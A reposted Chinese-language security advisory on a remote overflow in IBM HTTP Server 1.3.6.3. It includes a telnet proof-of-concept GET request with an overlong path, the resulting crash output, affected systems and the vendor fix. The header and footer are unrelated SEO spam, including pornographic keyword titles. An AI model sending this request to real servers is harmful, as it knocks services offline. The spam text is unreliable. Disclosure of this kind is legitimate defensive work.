国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 編程 > JSP > 正文

IBM HTTP Server 遠程溢出漏洞

2020-06-01 23:24:51
字體:
來源:轉載
供稿:網友
涉及程序:
GET

描述:
通過提交超長的GET請求導致IBM HTTP Server遠程溢出


詳細:
IBM 的 HTTP 服務器是一個 web 服務器。在 Windows NT 使用的版本中存在拒絕服務的漏洞。

如果提交一個超過219個字符的 GET 請求,將導致服務器停止響應,并報錯。要恢復服務正常工作需要重新啟動應用程序。成功的利用該漏洞,攻擊者可在受害的主機上執行任何代碼。(但這還未得到完全證實。)


以下代碼僅僅用來測試和研究這個漏洞,如果您將其用于不正當的途徑請后果自負


$ telnet target 80
GET /......(216個".")aaa HTTP/1.0

則系統會報告下列錯誤信息:
***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
ON_NOT_HANDLED.
***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe
注意:目標主機運行在Windows 2000下。

受影響的系統
IBM HTTP Server 1.3.6.3
- TurboLinux Turbo Linux 3.0.1
- Sun Solaris 2.6
- S.u.S.E. Linux 6.1
- S.u.S.E. Linux 6.0
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 sparc
- Microsoft Windows NT 4.0
- IBM AIX 4.2.1
- Caldera OpenLinux 2.2

解決方案:
IBM 已經在 1.3.12 版本中解決了此問題,下載地址:
http://www-4.ibm.com/software/webservers/httpservers/download.html

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 含山县| 马鞍山市| 罗平县| 金华市| 灵台县| 巴东县| 马龙县| 河北区| 县级市| 平湖市| 天全县| 时尚| 古田县| 胶州市| 外汇| 如东县| 板桥市| 德令哈市| 碌曲县| 乌鲁木齐市| 扬州市| 黄石市| 繁昌县| 司法| 余干县| 陵川县| 临武县| 尼木县| 柞水县| 琼结县| 科技| 阿坝县| 抚州市| 紫云| 永德县| 巨野县| 航空| 海阳市| 津市市| 安泽县| 宁化县|